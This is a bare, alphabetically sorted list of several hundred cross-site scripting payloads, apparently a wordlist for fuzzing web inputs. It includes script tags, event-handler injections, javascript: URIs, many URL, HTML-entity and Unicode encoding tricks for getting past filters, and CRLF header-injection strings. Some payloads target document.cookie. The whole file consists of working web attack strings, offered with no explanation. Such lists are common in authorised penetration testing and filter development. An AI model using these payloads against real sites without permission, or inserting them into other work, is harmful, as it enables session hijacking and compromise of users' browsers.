" /> <script>alert('XSS Testing");</script>
" accesskey=a onclick=alert(1) x="
" autofocus onkeyup="javascript:alert(123)
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
" onfocus="alert(1)" autofocus="
" onload=alert&#0000000040origin) value="
" onmouseover=alert(1) x="
""});});});alert(1);$('a').each(function(i){$(this).click(function(event){x({y
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"%2F><%2Fscript><script>alert%28document.cookie%29<%2Fscript>
"%3balert`1`%3b"
"&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;svg onload=alert(1)&amp;amp;amp;amp;gt;
"&amp;amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;amp;gt;
"&amp;amp;amp;gt;&amp;amp;amp;lt;svg onload=alert(1)&amp;amp;amp;gt;
"&amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;gt;
"&amp;amp;gt;&amp;amp;lt;svg onload=alert(1)&amp;amp;gt;
"&amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;gt;
"&amp;gt;&amp;lt;svg onload=alert(1)&amp;gt;
"&amp;lt;img src=1 onerror=alert(1)&amp;gt;
"&gt;&lt;svg onload=alert(1)&gt;
"&lt;img src=1 onerror=alert(1)&gt;
"'><img src=q onerror=alert(1)>
"+style%3d"x%3aexpression(alert(1))+
"/*'/*`/*--><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
"/>"/><img src=xss onerror=alert(2)>
"/>%3ciframe%20src%3djavascript%3aalert%283%29%3e
"/><iMg SrC="x" oNeRRor="alert(document.cookie);">
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
";(a=alert,b=1,a(b))
";alert(0);//
";alert(123);t="
";alert(String.fromCharCode(88,83,83))
";eval(unescape(location))//# %0Aalert(0)
";location=location.hash)//#0={};alert(0)
";}(document.writeln(decodeURI(location.hash))-"#<iframe src=javascript:alert(document.domain)
"<BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert(“XSS”)>"
"<IMG DYNSRC=\"javascript:alert('XSS');\">"
"<a href=""/*"">*/)});function+__MobileAppList(){alert(1)}//>"
"<iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29; >"
"<script>alert(0)</script>"@gmail.com
"<svg onload=alert (1)> " ;
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"></select><img%20src=1%20onerror=alert(1)>
"></tag><svg onload=alert(1)>
"></tag><svg onload=alert(spyerror)>
"></textarea><ScRiPt>prompt(1)</ScRiPt// "><iframe/onload=alert(1)// ”/>&_lt;_script>alert(1)&_lt;/scr_ipt&gt”/>
"><<script>alert(document.cookie);//<</script>
"><a>a</a><img src=x onerror=alert(document.cookie)>{{9-9}}';alert(0);://
"><audio onplay=alert(1);>
"><body/onload="{x:onerror=alert};x"
"><iframe onload=alert(1);>
"><iframe src="javascript:alert(XSS)">
"><iframe/src="javascript:alert(1%26%23x00000000000000000000000000029;"></iframe>
"><img src="javascript:alert(1);" />
"><img src="x" onerror=alert(1337) />
"><img src="x:x" onerror="alert(XSS)">
"><img src=1 onerror=alert&#x000000028;1&#x000000029;&#x00000003B;">
"><img src=1 onerror=alert(1)>.gif
"><img src=a onerror=alert(document.location)>
"><img src=x onerror='alert(document.domain)'>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(1);>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
"><img src=x onerror=this.innerHTML=''><script>alert(document.domain)</script>">
"><img%20src=x%20onerror="alert(%27POC%20By%20DrakenKun%27)"
"><img+src=x+onerror=alert(1)>
"><img/src/onerror=alert(`bluesecc`)>
"><img/src=x/onerro=6><img/src="1"/onerror=alert(1);>
"><img/src=x/onerro=6><img/src="1"/onerror=alert(1);>?test=test
"><sVg%2fonload%3dalert%2ebind%28%29%281%29%20class%3dRahul-Dh>
"><sc<>ript><onxXxxXXxXXXxx=()%20autofoco%20onmouseover=alert("HEJAP ZAIRY AL-SHARIF")></scr<>ipt>
"><script&#x00000003B;alert&#x000000028;1&#x000000029;&#x00000003B;</script>
"><script>alert('XSS')</script>
"><script>alert(1)</script>
"><script>alert(1)</script><"
"><script>alert(123);</script x="
"><script>alert(123)</script>
"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
"><script>alert(document.cookie)</script>
"><script>alert(“hello”)</script>jnyf0
"><svg onScroll="javascript:alert(1)//
"><svg onload=alert&#x00000040"1")>
"><svg onload=alert&#x2F;#x00000040"1")>
"><svg onload=alert&amp;#x27;#x00000040"1")>
"><svg onload=alert&amp;#x2F;#x00000040"1")>
"><svg onload=alert&amp;amp;#x00000040"1")>
"><svg onload=alert&amp;amp;#x27;#x00000040"1")>
"><svg onload=alert&amp;gt;#x00000040"1")>
"><svg onload=alert&quot;#x00000040"1")>
"><svg onload=alert(1)//
"><svg onload=alert(1)>
"><svg%20onload=alert%26%230000000040"1")>
"><svg%20onload=alert%26%230000000040"mysanismine")>
"><svg+onload=alert&amp;#x00"1
"><svg/onload=alert(/XSS/)
"><svg/onload=alert(1);>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><u>XSS</u><marquee+onstart='alert(document.cookie)'>XSS
"><xss/contenteditable/autofocus/onfocus="alert(1)">%232%20XSS</xss>
">>>>>><marquee>RXSS</marquee></head><abc%3E</script><script>alert(document.cookie)</script><meta
">Enter_Mouse_Pointer_Here_to_get_XSS<P/onpointerenter="alert(1)"><<"
"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//
"])},alert(1));(function xss() {//
"`'><script>\x09javascript:alert(1)</script>
"`'><script>\x3Bjavascript:alert(1)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
"aaa&#x3C;a href=javas&#x26;#99;ript:alert(1)&#x3E;click"
"alert(document.cookie)['script'](2);"
"autofocus onfocus='alert(document.domain)'
"autofocus/onfocus=alert(1)//
"jav&#x09;ascript:alert(1);">
"oncut="alert()
"oncut=alert(1)
"onfocus=JaVaSCript:alert(123) autofocus
"onmouseover="alert(1)
"onmouseover="alert(document.cookie)"><!--
"onmouseover=alert(1)
"onmouseover=alert(1)//
"onpointerover=”alert(‘XSS’)
"onx+%00+onpointerenter%3dalert(domain)+x"
"};alert(23);a={"a":
"}]}';</script><script>alert('You got XSSed')</script>
"}]}';alert('You got XSSed')</script>
"}]}';alert(1);{{'
#"><img src=/ onerror=alert(2)>
#"><svg onload=alert(1)>
#"jav&#x09;ascript:alert(1);">
#"onmouseover="alert(1)
#%3Cscript%3Ealert('XSS')%3C%2Fscript%3E
#&#39;-alert(1)-&#39;
#&lt;img&#47;src&#47;onerror=alert(`bluesecc`)&gt;
#&quot;-alert(1)}//
#'%26%26'javascript:alert%25281%2529//
#'-alert(1)-'
#';alert(123);t='
#/<script>alert(1234)</script>
#1&"><script>alert(1)</script>=1
#<!--><svg onload=alert(1)-->
#</script><script>alert('You got XSSed')</script>
#</script><script>alert(1)</script>
#<><img src=1 onerror=alert(1)>
#<ScRiPt>alert(1)</ScRiPt>#
#<body onload="alert('XSS')">
#<body onload=alert(“bingo”)>
#<iframe src="javascript:alert('XSS');"></iframe>
#<iframe src=javascript:alert(1)>
#<iframe/onload=alert(0);>
#<img src="invalid-image" onerror="alert('XSS');">
#<img src=1 onerror=alert(1)>
#<img/src/onerror=alert(`bluesecc`)>
#<script>alert(1)</script>
#<script>alert(document.domain)</script>
#<svg/onload=alert(“Hacked”)>
#\"-alert(1)}//
#\";alert(1);//
#\'-alert(1)//
#alert(document['cookie'])
#alert`1`
#blalala');alert(1);('a
#constructor.constructor('alert(1)')()
#jaVasCript:/*-/*/*\/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e
#jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e
#javascript:(alert('XSS Success!'))()
#javascript:alert(1)
#javascript:alert(2);
#javascript:alert(document.domain)
#x27;&lt;img src=1 onerror=alert(1)&gt;&#x27;
#{{_openBlock.constructor('alert(1)')()}}
#{{_s.constructor('alert(1)')()}}
#{{constructor.constructor(alert`1`)()}}
${alert(1)}
%'});%0aalert(1);%20//
%00"><img src=x onerror=alert`1`//
%00%00%00%00%00%00%00<script>alert(1)</script>
%00<script>alert(1);</script>
%00<script>alert(1)</script>
%09Jav%09ascript:alert(document.domain)
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)
%0D%0A%0D%0A%3Cscript%3E%0D%0A%20alert(1);%0D%0A%3C/script%3E%0D%0A
%0d%0a%0d%0a<script>alert(document.domain)</script>
%0d%0a%20"><img src=q onerror=alert(1)>
%0d%0a%20"><svg onload=alert(1)>
%0d%0a%20<body onload=alert("bingo")>
%0d%0a%20<img src=1 onerror=alert(1)>
%0d%0a%20<img/src/onerror=alert(bluesecc`)>
%0d%0a%20<script>alert(1)</script>
%0d%0a%20javascript:alert(1)
%0d%0aX-XSS-Protection:0%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--
%20"><img src=q onerror=alert(1)>
%20"><svg onload=alert(1)>
%20%3Cimg%20src=1%20onerror=alert(1)%3E
%20<body onload=alert("bingo")>
%20<img src=1 onerror=alert(1)>
%20<img/src/onerror=alert(bluesecc`)>
%20<script>alert(1)</script>
%20javascript:alert(1)
%22%2525%2F%28%29%2C%20alert%281%29%3B%27%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3B%3E%3Cscript%3E
%22%27%3E'><script>alert(2);</script>
%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3B%3E
%22%3E%3Cimg/src=x/onerro=6%3E%3Cimg/src=%221%22/onerror=alert(1);%3E1
%22%3E%3Cli%20style=list-style:url()%20onerror=javascript:alert(1)%3E%20%3Cdiv%20sty
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%22%3E%3Csvg%20onload%3Dalert%26amp%3B%26amp%3B%23x00000040%221%22%29%3E
%22%3E'><script>alert(2);</script>
%22%3EEnter_Mouse_Pointer_Here_to_get_XSS%3C%5K/onpointerenter=alert(location)%3E%3!
%22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--
%22-[9].every(alert)-%22//
%22-alert('XSS')-%22
%22onauxclick=alert`xss`+a
%22})))}catch(e){alert(document.domain);}//
%2500%27onmouseover=%27window.stop();alert(document.domain)%27
%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
%25253Cscript%25253Ealert('XSS')%25253C%252Fscript%25253E
%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520
%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520autofocus%253D%2527
%2527%2520onmouseover%253D%2527alert%25281%2529%2527%2520
%2527%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E
%252F%252F%252A%253E%253CScRipt%253Ealert%2528%252FXSS%252F%2529%253C%252FScriPT%253E
%253C%252Fscript%253E%253Cscript%253Ealert%2528%2527XSS%2520here%2521%2527%2529%253C%252Fscript%253E
%253Cimg%2520src%253Dx%2520onerror%253Dalert%2528%2529%253E
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
%253Cscript%253Ealert('XSS')%253C/script%253E
%253Cscript%253Ealert(1)%253C/script%253E
%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
%253cimg%20onerror=alert(1)%20src=a%253e
%253cscript%253ealert(1)%253c/script%253e
%26%2302java%26%23115cript:alert(document.domain)
%26amp%3Blt%3Bscript%26amp%3Bgt%3Balert%281%29%26amp%3Blt%3B%2Fscript%26amp%3Bgt%3B
%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B
%27%09);%0d%0a%09%09[1].find(alert)//
%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
%27%3E%27%3E%22%3E%script%3Ealert(2);%3C/script%3E
%27%3E'><script>alert(2);</script>
%27x%27onclick=%27alert(1)
%2F%2F%2A%3E%3CScRipt%3Ealert%28%2FXSS%2F%29%3C%2FScriPT%3E
%2sscript%2ualert()%2s/script%2u
%3C%5K/onpointerenter=alert(1)>
%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(/xss/)
%3Cbody%20onload%3D%60alert%28%2FXSS%2F%29%60%3E%3C%2Fbody%3E
%3Cbody%20onload%3D%60alert%28%60XSS%60%29%60%3E
%3Cbutton%20onclick%3D%60alert%28%2FXSS%2F%29%60%3EClick%20me%3C%2Fbutton%3E
%3Cbutton%20onclick%3D%60alert%28%60XSS%60%29%60%3EClick%3C%2Fbutton%3E
%3Cdiv%20style%3D%22width%3A%20expression%28alert%28%2FXSS%2F%29%29%3B%22%3E%3C%2Fdiv%3E
%3Cembed%20src%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E
%3Cform%20action%3D%22javascript%3Aalert%28%2FXSS%2F%29%22%3E%3Cinput%20type%3Dsubmit%3E%3C%2Fform%3E
%3Cform%20action%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E%3Cinput%20type%3Dsubmit%3E%3C%2Fform%3E
%3Ciframe%20src%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E%3C%2Fiframe%3E
%3Ciframe%20srcdoc%3D%60%3Cscript%3Ealert%28%2FXSS%2F%29%3B%3C%2Fscript%3E%60%3E%3C%2Fiframe%3E
%3Ciframe%20srcdoc%3D%60%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E%60%3E%3C%2Fiframe%3E
%3Cimg src='null' onerror=alert('spyerror')%3E
%3Cimg%20src%3D1%20onerror%3Dalert%281%29%3E
%3Cimg%20src%3Dx%20onerror%3D%60alert%28%2FXSS%2F%29%60%3E
%3Cimg%20src%3Dx%20onerror%3D%60alert%28%60XSS%60%29%60%3E
%3Cimg%20src=x%20onerror=alert(1)%3E
%3Cimg%20src=xx%20onerror=alert(1)%3E
%3Cinput%20onfocus%3D%60alert%28%60XSS%60%29%60%3E
%3Cinput%20type%3D%22text%22%20value%3D%22%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E%22%3E
%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Djavascript%3Aalert%28%2FXSS%2F%29%22%3E
%3Cobject%20data%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E%3C%2Fobject%3E
%3Cscript%0Baaa%3Ealert%281%29%3C/script%3E
%3Cscript%0Caaaaa%3Ealert%28123%29%3C/script%0Caaaaa%3E
%3Cscript%3E%60alert%60%28%2FXSS%2F%29%3B%3C%2Fscript%3E
%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2fscript%3E
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
%3Cscript%3Ealert('XSS')%3C/script%3E
%3Cscript%3Ealert(1)%3C/script%00TESTTEST%3E
%3Cscript%3Ealert(1)%3C/script%3E
%3Cscript%3Ealert(1)%3C/script%3E##1
%3Cscript%3Ealert(`xss`)%3C/script%3E
%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E
%3Csvg%20onload%3D%60alert%28%2FXSS%2F%29%60%3E%3C%2Fsvg%3E
%3Csvg%20onload%3D%60alert%28%60XSS%60%29%60%3E
%3Csvg%20onload=alert(1)%3E
%3Csvg%2Fonload%3D'alert%26%2340%2023%20%26%2341'%3E
%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E
%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >
%3E%3Cbody%20onload=javascript:alert(1)%3E
%3E'><script>alert(2);</script>
%3F%20"><img src=q onerror=alert(1)>
%3F%20"><svg onload=alert(1)>
%3F%20<body onload=alert("bingo")>
%3F%20<img src=1 onerror=alert(1)>
%3F%20<img/src/onerror=alert(bluesecc`)>
%3F%20<script>alert(1)</script>
%3F%20javascript:alert(1)
%3balert`1`%3b
%3cimg onerror=alert(1) src=a%3e
%3cscript%3ealert%281%29%3b%3c%2fscript%3e
%3cscript%3ealert("WXSS");%3c/script%3e
%3cscript%3ealert()%3c/script>
%3cscript%3ealert(1)%3c/script%3e
%3cscript%3ealert(1)%3c/script>
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%60%2balert/**/(1)%2b%60
%BCscript%BEalert(%A21%A2)%BC/script%BE
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
%E2%80%9C%3E%3CSvG%2Fonload%3Dalert%28document.domain%29%3E
%E5%98%8D%E5%98%8A%20"><img src=q onerror=alert(1)>
%E5%98%8D%E5%98%8A%20"><svg onload=alert(1)>
%E5%98%8D%E5%98%8A%20<body onload=alert("bingo")>
%E5%98%8D%E5%98%8A%20<img src=1 onerror=alert(1)>
%E5%98%8D%E5%98%8A%20<img/src/onerror=alert(bluesecc`)>
%E5%98%8D%E5%98%8A%20<script>alert(1)</script>
%E5%98%8D%E5%98%8A%20javascript:alert(1)
%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE
%E5%98%8D%E5%98%8ASet-Cookie%3A%20whoami%3Dthecyberneh%25u2028%25u2029XSS-Payload%3A%2520%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0d%0a%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE
%EF%BC%9Cimg%20src%3Dxxx%20onerror%3Dalert(1)%EF%BC%9E
%EF%BC%9Cscript%EF%BC%9E alert() %EF%BC%9C/script%EF%BC%9E
%EF%BC%9Cscript%EF%BC%9Ealert()%EF%BC%9C/script%EF%BC%9E
%script%alert(CXSS¢)4/script%
%u0022%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript%u003e
%u0025u0073u0063u0072u0069u0070u0074u003Ealert('XSS')%u003C%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003E
%u003Cscript%u003Ealert('XSS')%u003C/script%u003E
%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u003ealert('XSS')%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e
%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e
%uff1cscript%uff1ealert(1234)%uff1c/script%uff1e
%uff1cscript%uff1ealert(‘XSS’);%uff1c/script%uff1e
%uff3c%uff73%uff63%uff72%uff69%uff70%uff74%uff3ealert('XSS')%uff3c%uff2f%uff73%uff63%uff72%uff69%uff70%uff74%uff3e
%uff3c%uff73%uff63%uff72%uff69%uff70%uff74%uffe0alert('XSS')%uff3e
%uff3c%uff73%uff6cr%uff69%uff63%uff74%uffe0alert('XSS')%uff3e
%uff3cscript%uff3ealert('XSS')%uff3c/script%uff3e
& apos;><script>alert(2);</script>
& lt;script&gt;alert(2);& lt;/script&gt;
&#00039-alert(1)-&#00039
&#00;</form><input type&#61;"date" onfocus="alert(1)">
&#39;-alert(1)-&#39;
&#60;body onload=alert('ibrahimxss')&#62;&#34;&#34;
&#60;script&#62;alert(1)&#60;/script&#62;
&#60;svg/onload=alert(1)&#62;
&#62;'&gt;"<script>alert(2);</script>
&#x27;&lt;script&gt;alert(1)&lt;/script&gt;&#x27;
&#x27;&quot;&lt;img src=1 onerror=alert(1)&gt;&quot;&#x27;
&#x27;javascript:alert(2)&#x27;
&#x3C;img src=1 onerror=alert(1)&#x3E;
&#x3C;script&#x3E;alert(1)&#x3C;&#x2F;script&#x3E;
&#x3c;img&#x2f;src&#x2f;onerror=alert('kalendra')&#x3e;
&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3aalert(1)
&amp;#60;script&amp;#62;alert(1)&amp;#60;/script&amp;#62;
&amp;amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;amp;gt;
&amp;amp;amp;amp;lt;img/src/onerror=alert(`bluesecc`)&amp;amp;amp;amp;gt;
&amp;amp;amp;amp;lt;script&amp;amp;amp;amp;gt;alert(1)&amp;amp;amp;amp;lt;/script&amp;amp;amp;amp;gt;
&amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;gt;
&amp;amp;amp;lt;img/src/onerror=alert(`bluesecc`)&amp;amp;amp;gt;
&amp;amp;amp;lt;script&amp;amp;amp;gt;alert(1)&amp;amp;amp;lt;/script&amp;amp;amp;gt;
&amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;gt;
&amp;amp;lt;img/src/onerror=alert(`bluesecc`)&amp;amp;gt;
&amp;amp;lt;script&amp;amp;gt;alert(1)&amp;amp;lt;/script&amp;amp;gt;
&amp;lt;img src=1 onerror=alert(1)&amp;gt;
&amp;lt;img/src/onerror=alert(`bluesecc`)&amp;gt;
&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;
&fileName=')},1000);alert("XSS`);//
&lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt;
&lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt;
&lt;IMG SRC=\"javascript&#058;alert('XSS')\"
&lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt;
&lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;
&lt;IMG SRC=javascript&#058;alert('XSS')&gt;
&lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt;
&lt;img src=# onerror=alert(1)&gt;
&lt;img src=1 onerror=alert(1)&gt;
&lt;img src=x onerror=alert()>
&lt;img src=x onerror=alert(1)&gt;.crt
&lt;img src=x onerror=alert(document.domain)&gt;
&lt;img/src/onerror=alert(`bluesecc`)&gt;
&lt;img/src=&quot;x&quot;/onerror=alert(23)&gt;
&lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;
&lt;script&gt;alert('XSS')&lt;/script&gt;
&lt;script&gt;alert(1)&lt;/script&gt;
&lt;svg/onload=&#39;alert&amp;#40 23 &amp;#41;&#39;&gt;
&ltScRiPt&gtalert('Steiner254');&lt/ScRiPt&gt
&ltscr\x00ipt&gtalert('Steiner254')&lt/scr\x00ipt&gt
&ltscript&gtalert(document.cookie);&ltscript&gtalert
&ltscript&gtalert(document.cookie);</script>
&quot;&gt;&lt;svg onload=alert&amp;#x27;&#x00000040&quot;1&quot;&gt;
&quot;&gt;&lt;svg onload=alert&amp;#x2F;&#x00000040&quot;1&quot;&gt;
&quot;&gt;&lt;svg onload=alert&amp;amp;#x00000040&quot;1&quot;&gt;
&quot;&gt;&lt;svg onload=alert&amp;amp;#x27;&#x00000040&quot;1&quot;&gt;
&rdquo;&gt;&lt;svg onload=alert&amp;#000000040&quot;1&quot;&gt;
&redirect?url=javascript://alert(document.cookie)
&redirect_to=javascript:alert(document.domain)
&redirect_url=javscript:alert(1)
' onclick=alert(1) '
' onerror='alert("xss")'>
' onfocus='alert(1)'
'"/><img src= x onerror='alert(document.domain)'>
'"><script>alert(2);</script>
'">><div><meter onmouseover="alert(1)"</div>"
'"`><script>/* *\x2Fjavascript:alert(1)// */</script>
'%26%26'javascript:alert%25281%2529//
'%27%3E%27%22%3E%3Cscript%3Ealert(2);%3C/script%3E'
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
'&#x3E;'>"><script>alert(2);</script>
'&#x3E;'><script>alert(2);</script>
');alert(1)//
');alert(document.cookie)();//
')}, 1000); alert('xss')://
')}, 1000);alert("xss");//
'+ '</b><script>alert(document.cookie)</script><b><!--'
'-[document.domain].map(alert)-'
'-alert(0)-'
'-alert(1)-'
'-alert(1)//
'1/-alert\5023\51/';
'; x=eval; </script> <svg onpointerenter=alert()%20z= alert >
';alert("ibrahimxss");//
';alert(123);t='
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
';alert(document.cookie)//
';alert(document.domain)//
';globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain']);//
';parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain']);//
';self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain']);//
';this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain']);//
';window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain']);//
'<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/
'>  <script>alert(2);</script>
'>&lt;/b&gt;%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cb&gt;&lt;!--
'>&lt;/b&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;b&gt;&lt;!--
'>'+'><script>alert(2);</script>
'>'><SCript>alert(2);</script>
'>'\n><script>alert(2);</script>
'></script><svg/onload=alert(document.cookie)>
'><scr'+'ipt>alert(document.cookie)</scr'+'ipt><b><!--
'><script>alert(123);</script x='
'><script>alert(123)</script>
'><script>alert(document.cookie);</script>
'><script>alert(document.cookie)</script>
'>alert(1)</script><script/1='
'>👽💻🔥<script>alert(2);</script>
'\u0029\u0028};alert(document.cookie);//"
'\u003E'\u0022><script>alert(2);</script>
'\u003e\'</b><script>alert(document.cookie)</script><b><!--'
'`"//><script>alert(1)</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
'alert(1)'.replace(/.+/,eval)
'alert\x2823\x29'instanceof{[Symbol.hasInstance]:eval}
'href=javascript:alert()>click me<a/y='
'javaScriPt:alert\x2845\x29'
'onfocus='alert(1)' autofocus='
'onload=alert(1)><svg/1='
'te' / alert('/') / 'xt';
'|alert(1)|'
'});alert(document.cookie);//'
('+'alert(1)+')();
(A("onerror='alert`1`'testabcd))/
(A(%22onerror=%22alert%601%60%22))
(A(%22onerror='alert%601%60'testabcd))/
(A(%22onerror='alert%60123%60'test))/
(alert)()
(alert)(1)
(function(){alert(document.cookie)})();
(function(a){alert(1)}).call()
(xss"><!--><svg/onload=alert(document.domain)>)
*/</script>'>alert(1)/*<script/1='
*/</script><script>alert()/*
*/alert(1)">'onload="/*<svg/1='
*/alert(1)</script><script>/*
+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
+alert(1)+
-(a=alert,b="_Y000!_",[b].find(a))-'
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
--><script>alert(123)</script>
--><svg onload=alert(1)>
-alert(1)-&apos;
-alert(1)-'
-alert(23)/
.alert(1);
/%09/javascript:alert(1)
/%09/javascript:alert(1);
/%2527)%253B%2520alert(document.cookies)%253B%252F%252F
/* <audio src=1 onloadstart=alert&lpar;1&rpar;//> */
/*\"<sVg/oNloAd=alert(document.domain)//>\x3e
/*alert(1)*/
//";alert(String.fromCharCode(88,83,83))
//%250Aalert?.(1)//
//*><ScRipt>alert(/XSS/)</ScriPT>
///%01javascript:alert(document.cookie)/
//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
//?aspxerrorpath=<script>alert(1)</script>
//comment%0a%0dalert(0);
//j%5c%5cjavascript%3aalert(document.domain)
//j\\javascript:alert(document.domain)
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
/<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>
/<script>alert(1234)</script>
/><script>window.alert('XSS Vulnerable');</script>
/?xss=500); alert(document.cookie);//
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
